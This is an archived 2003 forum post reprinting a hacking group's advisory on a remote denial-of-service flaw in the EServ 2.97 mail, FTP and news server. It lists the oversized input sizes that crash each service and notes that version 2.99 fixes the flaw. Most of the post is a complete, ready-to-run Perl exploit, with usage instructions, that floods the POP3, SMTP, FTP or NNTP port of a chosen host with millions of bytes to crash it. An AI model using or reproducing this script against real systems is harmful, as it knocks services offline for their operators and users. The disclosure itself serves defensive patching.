PDA

Bekijk Volledige Versie : EServ/2.97 remote DoS



D4rkGr3y
05/01/03, 00:18
################################################## ###*
# Damage Hacking Group security advisory
# www.dhgroup.org
################################################## ###*
#Product: EServ/2.97
#Authors: Etype Co. [www.eserv.ru]
#Vulnerable versions: up to v.2.97, may be 2.98
#Not vulnerable versions: v.2.99
#Vulnerability: remote DoS
################################################## ###*

#Overview#--------------------------------------------------------------#
From EServ's 'readme' file:
"Eserv/2.97 - mail, news, web, ftp and proxy server.
It includes:

- SMTP, POP3, NNTP -servers
- caching HTTP/FTP proxy
- HTTP server (maintaining virtual servers)
- FTP server (with download and upload resuming support)
- FTP-gate
- Socks5, Socks4 and 4a proxy
- TCP รจ UDP mapping proxy
- Finger-server"

#Problem#---------------------------------------------------------------#
We founded 4 bugs, that allows to kill EServ by sending data with a
very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b,
NNTP - 5001216b. This is not buffer overflow, so it's impossible to use
this bugs for privelege escalation or something like this.

#Fix#--------------------------------------------------------------------#
Download new verion from www.eserv.ru. EServ/2.99 _is_not_vulnerable_.

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
################################################## ####
#EServ/2.97 remote DoS xsploit
#Bugs founded in v.2.97 but I think that 2.98 is
#vulnerable too.
#################
#Usage: perl EServ.DoS.pl [host] [port] [service_type]
#Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
#Example: perl EServ.DoS.pl localhost 110 pop
#################
#If something wrong or u wanna to discuss something,
#contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981
################################################## #####
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$param = $ARGV[2];
$data = "a";
print "\n\n";;
print "#Product: EServ/2.97 - www.eserv.ru\n";
print "#Vuln: remote DoS\n";
print "#Xsploit by D4rkGr3y\n";
print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";
if ($param) {
$num = "4950001" if $param eq "pop";
$num = "4960000" if $param eq "smtp";
$num = "5005312" if $param eq "ftp";
$num = "5001215" if $param eq "nntp";
die "Error in params\n" if !$num;
print "Connecting...";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Socket
error.\n";
print "OK\n";
$buf .= $data x $num;
print "Attacking...";
print $socket "$buf\n";
print "OK\n\n";
print "Vizit us at www.dhgroup.org";
close($socket);
} else {
print "Error in Params.\n";
print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
exit;
}

#EOF

Best regards www.dhgroup.org
D4rkGr3y icq 540981